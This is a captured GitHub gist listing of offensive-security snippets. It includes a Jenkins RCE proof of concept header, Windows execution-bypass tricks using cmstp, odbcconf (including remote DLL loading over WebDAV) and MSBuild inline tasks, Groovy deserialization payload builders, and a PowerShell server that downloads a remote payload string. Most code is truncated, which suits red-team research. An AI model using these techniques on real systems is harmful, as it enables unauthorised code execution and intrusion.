Skip to content

Instantly share code, notes, and snippets.

Chris Gates carnal0wnage

Block or report user

Report or block carnal0wnage

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
akhil-reni / payload
Created Jul 26, 2019
Jenkins Metaprogramming RCE Create new user
View payload
adamyordan /
Last active Jul 29, 2019
# Author: Adam Jordan
# Date: 2019-02-15
# Repository:
# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
import argparse
import jenkins
View xsl-notepad.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="" ?>
View cmstp.inf
;cmstp.exe /s cmstp.inf
Arno0x / odbcconf.cs
Created Nov 22, 2017
Download and execute arbitrary code with odbcconf.exe
View odbcconf.cs
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
using System;
Arno0x / msbuild.xml
Created Nov 17, 2017
MSBuild project definition to execute arbitrary code from msbuild.exe
View msbuild.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
<Target Name="Hello">
<SharpLauncher >
DiabloHorn /
Created Sep 9, 2017
Java class to generate a Groovy serialized payload
DiabloHorn -
For learning purposes we build the groovy payload ourselves instead of using
ysoserial. This helps us better understand the chain and the mechanisms
involved in exploiting this bug.
compile with:
javac -cp <path to groovy lib>
javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar
DiabloHorn /
Created Sep 9, 2017
Exploit for the DeserLab vulnerable implementation
#!/usr/bin/env python
DiabloHorn -
cobbr / server.ps1
Last active Oct 4, 2018 — forked from obscuresec/dirtywebserver.ps1
Dirty PowerShell Webserver
View server.ps1
$mk = (new-object net.webclient).downloadstring("")
$Hso = New-Object Net.HttpListener
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
$Buf = [Text.Encoding]::UTF8.GetBytes($mk)

Cumulus Toolkit Cliff Notes

By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to setup the full environment, please let me know if you are interested in such a thing.


You can’t perform that action at this time.